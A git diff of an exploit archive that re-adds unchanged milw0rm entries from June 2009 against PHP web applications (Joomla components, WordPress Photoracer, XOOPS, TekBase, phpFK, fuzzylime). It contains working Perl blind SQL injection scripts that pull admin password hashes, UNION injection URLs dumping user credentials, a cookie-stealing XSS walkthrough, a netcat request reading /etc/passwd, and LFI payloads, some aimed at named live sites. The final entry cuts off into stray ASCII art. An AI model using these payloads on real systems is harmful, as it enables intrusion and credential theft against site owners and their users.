diff --git a/platforms/php/webapps/8959.pl b/platforms/php/webapps/8959.pl
index bdc09e9c4..1f2e4b587 100755
--- a/platforms/php/webapps/8959.pl
+++ b/platforms/php/webapps/8959.pl
@@ -1,87 +1,87 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use Getopt::Long;
-if(!$ARGV[1])
-{
-  print "                                                                        \n";
-  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
-  print "  o   Joomla Component com_ijoomla_rss Blind SQL Injection Exploit              o\n";
-  print "  o   Author:xoron                                               o\n";
-  print "  o   More info:http://joomla15.ijoomlademo.com o\n";
-  print "  o   vendor:http://ijoomlademo.com                                o\n";
-  print "  o   Dork :   com_ijoomla_rss                                       o\n";
-  print "  o   Usage:   perl bachir.pl host path                        o\n";
-  print "  o   Example: perl bachir.pl www.host.com /joomla/ -s 2                o\n";
-  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
-  exit;
-}
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $userid  = 1;
-my $sid     = $ARGV[2];
-my %options = ();
-GetOptions(\%options, "u=i", "s=i");
-print "[~] Exploiting...\n";
-if($options{"u"})
-{
-  $userid = $options{"u"};
-}
-if($options{"s"})
-{
-  $sid = $options{"s"};
-}
-syswrite(STDOUT, "[~] MD5-Hash: ", 14);
-for(my $i = 1; $i <= 32; $i++)
-{
-  my $f = 0;
-  my $h = 48;
-  while(!$f && $h <= 57)
-  {
-    if(istrue2($host, $path, $userid, $sid, $i, $h))
-    {
-      $f = 1;
-      syswrite(STDOUT, chr($h), 1);
-    }
-    $h++;
-  }
-  if(!$f)
-  {
-    $h = 97;
-    while(!$f && $h <= 122)
-    {
-      if(istrue2($host, $path, $userid, $sid, $i, $h))
-      {
-        $f = 1;
-        syswrite(STDOUT, chr($h), 1);
-      }
-      $h++;
-    }
-  }
-}
-print "\n[~] Exploiting done\n";
-sub istrue2
-{
-  my $host  = shift;
-  my $path  = shift;
-  my $uid   = shift;
-  my $sid   = shift;
-  my $i     = shift;
-  my $h     = shift;
- 
-  my $ua = LWP::UserAgent->new;
-  my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";
-  my $resp = $ua->get($query);
-  my $content = $resp->content;
-  my $regexp = "seminar_boxA";
- 
-  if($content =~ /$regexp/)
-  {
-    return 1;
-  }
-  else
-  {
-    return 0;
-  }
-}
-
-# milw0rm.com [2009-06-15]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+if(!$ARGV[1])
+{
+  print "                                                                        \n";
+  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
+  print "  o   Joomla Component com_ijoomla_rss Blind SQL Injection Exploit              o\n";
+  print "  o   Author:xoron                                               o\n";
+  print "  o   More info:http://joomla15.ijoomlademo.com o\n";
+  print "  o   vendor:http://ijoomlademo.com                                o\n";
+  print "  o   Dork :   com_ijoomla_rss                                       o\n";
+  print "  o   Usage:   perl bachir.pl host path                        o\n";
+  print "  o   Example: perl bachir.pl www.host.com /joomla/ -s 2                o\n";
+  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
+  exit;
+}
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $userid  = 1;
+my $sid     = $ARGV[2];
+my %options = ();
+GetOptions(\%options, "u=i", "s=i");
+print "[~] Exploiting...\n";
+if($options{"u"})
+{
+  $userid = $options{"u"};
+}
+if($options{"s"})
+{
+  $sid = $options{"s"};
+}
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+for(my $i = 1; $i <= 32; $i++)
+{
+  my $f = 0;
+  my $h = 48;
+  while(!$f && $h <= 57)
+  {
+    if(istrue2($host, $path, $userid, $sid, $i, $h))
+    {
+      $f = 1;
+      syswrite(STDOUT, chr($h), 1);
+    }
+    $h++;
+  }
+  if(!$f)
+  {
+    $h = 97;
+    while(!$f && $h <= 122)
+    {
+      if(istrue2($host, $path, $userid, $sid, $i, $h))
+      {
+        $f = 1;
+        syswrite(STDOUT, chr($h), 1);
+      }
+      $h++;
+    }
+  }
+}
+print "\n[~] Exploiting done\n";
+sub istrue2
+{
+  my $host  = shift;
+  my $path  = shift;
+  my $uid   = shift;
+  my $sid   = shift;
+  my $i     = shift;
+  my $h     = shift;
+ 
+  my $ua = LWP::UserAgent->new;
+  my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";
+  my $resp = $ua->get($query);
+  my $content = $resp->content;
+  my $regexp = "seminar_boxA";
+ 
+  if($content =~ /$regexp/)
+  {
+    return 1;
+  }
+  else
+  {
+    return 0;
+  }
+}
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8961.txt b/platforms/php/webapps/8961.txt
index 17af2d683..152fe0e69 100755
--- a/platforms/php/webapps/8961.txt
+++ b/platforms/php/webapps/8961.txt
@@ -1,21 +1,21 @@
-Wordpress Photoracer Plugin => SQL injection
-http://wordpress.org/extend/plugins/photoracer/ 
-
-Author: Kacper
-Website: http://devilteam.pl/
-
-Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 
-
-Pozdro: Ratman, Kopaczka, FDJ
-
-Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
-
-Vuln:
-
-http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
-
-big thanks str0ke for you!
-
-be safe all :)
-
-# milw0rm.com [2009-06-15]
+Wordpress Photoracer Plugin => SQL injection
+http://wordpress.org/extend/plugins/photoracer/ 
+
+Author: Kacper
+Website: http://devilteam.pl/
+
+Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 
+
+Pozdro: Ratman, Kopaczka, FDJ
+
+Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
+
+Vuln:
+
+http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
+
+big thanks str0ke for you!
+
+be safe all :)
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8962.txt b/platforms/php/webapps/8962.txt
index bec129470..01c806542 100755
--- a/platforms/php/webapps/8962.txt
+++ b/platforms/php/webapps/8962.txt
@@ -1,15 +1,15 @@
-#################################################################################################################
-[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
-[+] Discovered By SirGod 
-[+] www.mortal-team.org
-#################################################################################################################
-
-[+] Script homepage : http://phpcollegeex.sourceforge.net/
-
-[+] SQL Injection 
-
-   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
-
-#################################################################################################################
-
-# milw0rm.com [2009-06-15]
+#################################################################################################################
+[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
+[+] Discovered By SirGod 
+[+] www.mortal-team.org
+#################################################################################################################
+
+[+] Script homepage : http://phpcollegeex.sourceforge.net/
+
+[+] SQL Injection 
+
+   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
+
+#################################################################################################################
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8967.txt b/platforms/php/webapps/8967.txt
index 341e98d6f..8569d7021 100755
--- a/platforms/php/webapps/8967.txt
+++ b/platforms/php/webapps/8967.txt
@@ -1,41 +1,41 @@
-#################################################################################################################
-[+] The Recipe Script version 5 Cookie Grabber Exploit
-[+] Discovered By ThE g0bL!N
-[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) )
-[+] Vendor:http://recipescript.com/
-[+] Dork"script by RECIPE SCRIPT"
-#################################################################################################################
-PoC
---
-[+] Make 2 files and upload to your host :
-[+]cookie.php  - > Put in this File That Code:
- 
-[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
- 
-[+]Exploit:
-   -------
-           1)First Register in the site  In Fisrt Name:  Put That code
-           2) 
-           3)Then After Complete Registration Go to add_recipe.php To add recipe
-           4)Add a normal Recipe
-           5) The Victim Open page of recipes recipes.php
-           6)The js code Worked 
-Example
--------
-Result:
-------
- PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
- Then we put that code
- javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";
- After That you see :
- ThE g0bL!N
- Profile
- Log off
-################################################################################################################
-
-# milw0rm.com [2009-06-15]
+#################################################################################################################
+[+] The Recipe Script version 5 Cookie Grabber Exploit
+[+] Discovered By ThE g0bL!N
+[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) )
+[+] Vendor:http://recipescript.com/
+[+] Dork"script by RECIPE SCRIPT"
+#################################################################################################################
+PoC
+--
+[+] Make 2 files and upload to your host :
+[+]cookie.php  - > Put in this File That Code:
+ 
+[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
+ 
+[+]Exploit:
+   -------
+           1)First Register in the site  In Fisrt Name:  Put That code
+           2) 
+           3)Then After Complete Registration Go to add_recipe.php To add recipe
+           4)Add a normal Recipe
+           5) The Victim Open page of recipes recipes.php
+           6)The js code Worked 
+Example
+-------
+Result:
+------
+ PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
+ Then we put that code
+ javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";
+ After That you see :
+ ThE g0bL!N
+ Profile
+ Log off
+################################################################################################################
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8968.txt b/platforms/php/webapps/8968.txt
index bd2125dc2..4f70ae36d 100755
--- a/platforms/php/webapps/8968.txt
+++ b/platforms/php/webapps/8968.txt
@@ -1,109 +1,109 @@
-------------------------------------------------------------------------------
-Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
-------------------------------------------------------------------------------
-
-
- #####################################################
- # [+] Author        :  Chip D3 Bi0s                 #
- # [+] Email         :  chipdebios[alt+64]gmail.com  #
- # [+] Vulnerability :  Blind SQL injection          #
- #####################################################
-
-
-
-Example:
-http://localHost/path/index.php?option=com_jumi&fileid=n
-
-n=number fileid valid
-
-:
-'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
-'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
-/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
-etc, etc...
-
-DEMO LIVE:
-http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
-
-etc, etc....
-
-+++++++++++++++++++++++++++++++++++++++
-#[!] Produced in South America
-+++++++++++++++++++++++++++++++++++++++
-
-if you want to save the work, you can use the following script
-
--------------------------------
-
-#!/usr/bin/perl -w
-
-use LWP::UserAgent;
-
-
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
-print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";
-print "\t\t-----------------------------------------------------------------\n\n";
-
-
-
-
-print "http://wwww.host.org/Path: ";
-chomp(my $target=);
-print " [-] Introduce fileid: ";
-chomp($z=);
-
-print " [+] Password: ";
-
-$column_name="concat(password)";
-$table_name="jos_users";
-
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-
-for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter
-{            #c referido a ascci 48-57, 97-102
- 
-
-
-
-  for ($c=48;$c<=57;$c++) 
-
-{
- $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
- my $res = $b->request(HTTP::Request->new(GET=>$host));
- my $content = $res->content;
- my $regexp = "com_";
-# print "limit:";
-# print "$x";
-# print "; assci:";
-# print "$c;";
- if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
- }
-
-
-
-
-
-for ($c=97;$c<=102;$c++) 
-{
-
-
- 
- $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
- my $res = $b->request(HTTP::Request->new(GET=>$host));
- my $content = $res->content;
- my $regexp = "com_";
-# print "limit:";
-# print "$x";
-# print "; assci:";
-# print "$c;";
- if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
- }
- 
-
-}
-
-# milw0rm.com [2009-06-15]
+------------------------------------------------------------------------------
+Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
+------------------------------------------------------------------------------
+
+
+ #####################################################
+ # [+] Author        :  Chip D3 Bi0s                 #
+ # [+] Email         :  chipdebios[alt+64]gmail.com  #
+ # [+] Vulnerability :  Blind SQL injection          #
+ #####################################################
+
+
+
+Example:
+http://localHost/path/index.php?option=com_jumi&fileid=n
+
+n=number fileid valid
+
+:
+'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
+'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
+/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
+etc, etc...
+
+DEMO LIVE:
+http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
+
+etc, etc....
+
++++++++++++++++++++++++++++++++++++++++
+#[!] Produced in South America
++++++++++++++++++++++++++++++++++++++++
+
+if you want to save the work, you can use the following script
+
+-------------------------------
+
+#!/usr/bin/perl -w
+
+use LWP::UserAgent;
+
+
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
+print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";
+print "\t\t-----------------------------------------------------------------\n\n";
+
+
+
+
+print "http://wwww.host.org/Path: ";
+chomp(my $target=);
+print " [-] Introduce fileid: ";
+chomp($z=);
+
+print " [+] Password: ";
+
+$column_name="concat(password)";
+$table_name="jos_users";
+
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+
+for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter
+{            #c referido a ascci 48-57, 97-102
+ 
+
+
+
+  for ($c=48;$c<=57;$c++) 
+
+{
+ $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
+ my $res = $b->request(HTTP::Request->new(GET=>$host));
+ my $content = $res->content;
+ my $regexp = "com_";
+# print "limit:";
+# print "$x";
+# print "; assci:";
+# print "$c;";
+ if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
+ }
+
+
+
+
+
+for ($c=97;$c<=102;$c++) 
+{
+
+
+ 
+ $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
+ my $res = $b->request(HTTP::Request->new(GET=>$host));
+ my $content = $res->content;
+ my $regexp = "com_";
+# print "limit:";
+# print "$x";
+# print "; assci:";
+# print "$c;";
+ if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
+ }
+ 
+
+}
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8974.txt b/platforms/php/webapps/8974.txt
index f87d226c4..cbe22be4c 100755
--- a/platforms/php/webapps/8974.txt
+++ b/platforms/php/webapps/8974.txt
@@ -1,115 +1,114 @@
-
-
-  ======================================================================== 
-              XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
-  ========================================================================
-   
-  Affected Software : XOOPS <= 2.3.3
-  Author            : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org
-  Advisory number   : NS-2009-01
-  Advisory URL      : http://blog.nibblesec.org/advisories/NS-2009-01.txt
-  Severity          : Low/Medium
-  Local/Remote      : Remote
-
-
-  [Summary]
- 
-  XOOPS is a web application platform written in PHP for the MySQL database.
-  Its object orientation makes it an ideal tool for developing small or large
-  community websites, intra company and corporate portals, weblogs and much
-  more. (Reference : http://www.xoops.org).
-
-  Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
-  2.3.3, which could be exploited to read system or XOOPS configuration files
-  ("mainfile.php").
-
-
-  [Vulnerability Details]
-
-  A vulnerable read_file() function can be found in "module_icon.php" under
-  /xoops_lib/modules/protector/. Here an image icon is read and its full
-  pathname is constructed using a user-controllable variable called
-  "$mydirpath" :
-
-  =============================================================================
-  [...]
-  if( file_exists( $mydirpath.'/module_icon.png' ) ) {
-      $use_custom_icon = true ;
-      $icon_fullpath = $mydirpath.'/module_icon.png' ;
-  } else {
-      $use_custom_icon = false ;
-      $icon_fullpath = dirname(__FILE__).'/module_icon.png' ;
-  }
-
-  [...]
-  } else {
-
-      readfile( $icon_fullpath ) ;
-  }
-  ?>
-  =============================================================================
-
-  If register_globals is enabled and magic_quotes_gpc disabled, it's possible
-  to control the "$mydirpath" variable content and inject an arbitrary filename
-  (followed by a NULL byte (%00) to make file_exists() function ignore the
-  following "/module_icon.png"), resulting in file content inclusion in
-  application response.
-
-
-  [Proof of Concept Exploit]
-
-  Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
-  one generated by the vulnerable script). Bacause of this netcat/telnet can be
-  easily used to exploit this vulnerability :
-
-  daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
-   mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80
-
-  HTTP/1.1 200 OK
-  Date: Mon, 16 Mar 2009 19:07:03 GMT
-  Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
-  X-Powered-By: PHP/5.2.6-2ubuntu4.1
-  Expires: Mon, 16 Mar 2009 21:00:00 +0100
-  Cache-Control: public, max-age=3600
-  Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
-  Content-Length: 1661
-  Connection: close
-  Content-Type: image/png
-
-  root:x:0:0:root:/root:/bin/bash
-  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-  bin:x:2:2:bin:/bin:/bin/sh
-  [...]
-  daath@shaytan:~$
-
-
-  [Time Table]
-
-  17/03/2009 - Vendor notified.
-  17/03/2009 - Vendor response.
-  28/05/2009 - Vendor re-contacted (no answer).
-  16/06/2009 - Public disclosure.
-
-
-  [Legal Notices]
-
-  The information in the advisory is believed to be accurate at the 
-  time of publishing based on currently available information. 
-  This information is provided as-is, as a free service to the community. 
-  There are no warranties with regard to this information.
-  The author does not accept any liability for any direct, 
-  indirect, or consequential loss or damage arising from use of, 
-  or reliance on, this information.
-  Permission is hereby granted for the redistribution of this alert,
-  provided that the content is not altered in any way, except 
-  reformatting, and that due credit is given.
-  
-  This vulnerability has been disclosed in accordance with the RFP 
-  Full-Disclosure Policy v2.0, available at:
-  http://www.wiretrip.net/rfp/policy.html
-
-
-
-# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke
-
-# milw0rm.com [2009-06-16]
+
+  ======================================================================== 
+              XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
+  ========================================================================
+   
+  Affected Software : XOOPS <= 2.3.3
+  Author            : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org
+  Advisory number   : NS-2009-01
+  Advisory URL      : http://blog.nibblesec.org/advisories/NS-2009-01.txt
+  Severity          : Low/Medium
+  Local/Remote      : Remote
+
+
+  [Summary]
+ 
+  XOOPS is a web application platform written in PHP for the MySQL database.
+  Its object orientation makes it an ideal tool for developing small or large
+  community websites, intra company and corporate portals, weblogs and much
+  more. (Reference : http://www.xoops.org).
+
+  Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
+  2.3.3, which could be exploited to read system or XOOPS configuration files
+  ("mainfile.php").
+
+
+  [Vulnerability Details]
+
+  A vulnerable read_file() function can be found in "module_icon.php" under
+  /xoops_lib/modules/protector/. Here an image icon is read and its full
+  pathname is constructed using a user-controllable variable called
+  "$mydirpath" :
+
+  =============================================================================
+  [...]
+  if( file_exists( $mydirpath.'/module_icon.png' ) ) {
+      $use_custom_icon = true ;
+      $icon_fullpath = $mydirpath.'/module_icon.png' ;
+  } else {
+      $use_custom_icon = false ;
+      $icon_fullpath = dirname(__FILE__).'/module_icon.png' ;
+  }
+
+  [...]
+  } else {
+
+      readfile( $icon_fullpath ) ;
+  }
+  ?>
+  =============================================================================
+
+  If register_globals is enabled and magic_quotes_gpc disabled, it's possible
+  to control the "$mydirpath" variable content and inject an arbitrary filename
+  (followed by a NULL byte (%00) to make file_exists() function ignore the
+  following "/module_icon.png"), resulting in file content inclusion in
+  application response.
+
+
+  [Proof of Concept Exploit]
+
+  Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
+  one generated by the vulnerable script). Bacause of this netcat/telnet can be
+  easily used to exploit this vulnerability :
+
+  daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
+   mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80
+
+  HTTP/1.1 200 OK
+  Date: Mon, 16 Mar 2009 19:07:03 GMT
+  Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
+  X-Powered-By: PHP/5.2.6-2ubuntu4.1
+  Expires: Mon, 16 Mar 2009 21:00:00 +0100
+  Cache-Control: public, max-age=3600
+  Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
+  Content-Length: 1661
+  Connection: close
+  Content-Type: image/png
+
+  root:x:0:0:root:/root:/bin/bash
+  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+  bin:x:2:2:bin:/bin:/bin/sh
+  [...]
+  daath@shaytan:~$
+
+
+  [Time Table]
+
+  17/03/2009 - Vendor notified.
+  17/03/2009 - Vendor response.
+  28/05/2009 - Vendor re-contacted (no answer).
+  16/06/2009 - Public disclosure.
+
+
+  [Legal Notices]
+
+  The information in the advisory is believed to be accurate at the 
+  time of publishing based on currently available information. 
+  This information is provided as-is, as a free service to the community. 
+  There are no warranties with regard to this information.
+  The author does not accept any liability for any direct, 
+  indirect, or consequential loss or damage arising from use of, 
+  or reliance on, this information.
+  Permission is hereby granted for the redistribution of this alert,
+  provided that the content is not altered in any way, except 
+  reformatting, and that due credit is given.
+  
+  This vulnerability has been disclosed in accordance with the RFP 
+  Full-Disclosure Policy v2.0, available at:
+  http://www.wiretrip.net/rfp/policy.html
+
+
+
+# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke
+
+# milw0rm.com [2009-06-16]
diff --git a/platforms/php/webapps/8975.txt b/platforms/php/webapps/8975.txt
index bc16cf0c0..342ed7627 100755
--- a/platforms/php/webapps/8975.txt
+++ b/platforms/php/webapps/8975.txt
@@ -1,19 +1,19 @@
-                =-=-local file include-=-=
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
-script: phpFK - PHP Forum
--------------------------------------------------
-Author: ahmadbady
-my site :Coming Soon
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-download from:http://www.frank-karau.de/download.php
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-xpl:
-path/include/page_bottom.php?_FORUM[settings_design_style]={[(local_file)]}%00
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
-
-# milw0rm.com [2009-06-17]
+                =-=-local file include-=-=
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
+script: phpFK - PHP Forum
+-------------------------------------------------
+Author: ahmadbady
+my site :Coming Soon
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+download from:http://www.frank-karau.de/download.php
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+xpl:
+path/include/page_bottom.php?_FORUM[settings_design_style]={[(local_file)]}%00
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8977.txt b/platforms/php/webapps/8977.txt
index 9ce8f9d39..0d09a6e04 100755
--- a/platforms/php/webapps/8977.txt
+++ b/platforms/php/webapps/8977.txt
@@ -1,37 +1,37 @@
-############################
-# Author: n3wb0ss
-# Date: 15/06/09
-# Contact: n3wboss@Safe-mail.net
-############################
-# Software: TekBase All-in-One 3.1 
-# Vendor: tekbase.de
-# Example: http://demo.tekbase.de/
-# Vendor contacted: No
-# Risk: High
-############################
-# I found this website on a german board, looking for another script.
-# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter...
-# It's vuln I found a lot more, but I decided to release just two examples to the public.
-# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login)
-############################
-# Here it is (adminaccess needed):
-# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
-# Have fun!
-# POC: 
-http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*
-
-############################
-# Second one( just be a member):
-# POC:
-http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
-http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*
-
-############################
-# As said before, just 2 of many vulns
-# 
-#
-# H4ppy Gr33tinGs to the only On3
-#
-###########################
-
-# milw0rm.com [2009-06-17]
+############################
+# Author: n3wb0ss
+# Date: 15/06/09
+# Contact: n3wboss@Safe-mail.net
+############################
+# Software: TekBase All-in-One 3.1 
+# Vendor: tekbase.de
+# Example: http://demo.tekbase.de/
+# Vendor contacted: No
+# Risk: High
+############################
+# I found this website on a german board, looking for another script.
+# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter...
+# It's vuln I found a lot more, but I decided to release just two examples to the public.
+# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login)
+############################
+# Here it is (adminaccess needed):
+# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
+# Have fun!
+# POC: 
+http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*
+
+############################
+# Second one( just be a member):
+# POC:
+http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
+http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*
+
+############################
+# As said before, just 2 of many vulns
+# 
+#
+# H4ppy Gr33tinGs to the only On3
+#
+###########################
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8978.txt b/platforms/php/webapps/8978.txt
index 13f45d21c..3cd981950 100755
--- a/platforms/php/webapps/8978.txt
+++ b/platforms/php/webapps/8978.txt
@@ -1,78 +1,78 @@
-+------------------------------------------------------------------------+
-| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
-+-----------+------------------------------------------------------------+
-| by staker | 
-+-----------+---------------------+
-| mail: staker[at]hotmail[dot]it  |
-| url: http://cms.fuzzylime.co.uk |
-+---------------------------------+    
-
-
-[1][LFI]
-
-http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
-
-Vulnerable code: confirm.php (local file inclusion mq=off)
------------------------------------------------------------------
- 1.   []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
-** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
-**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
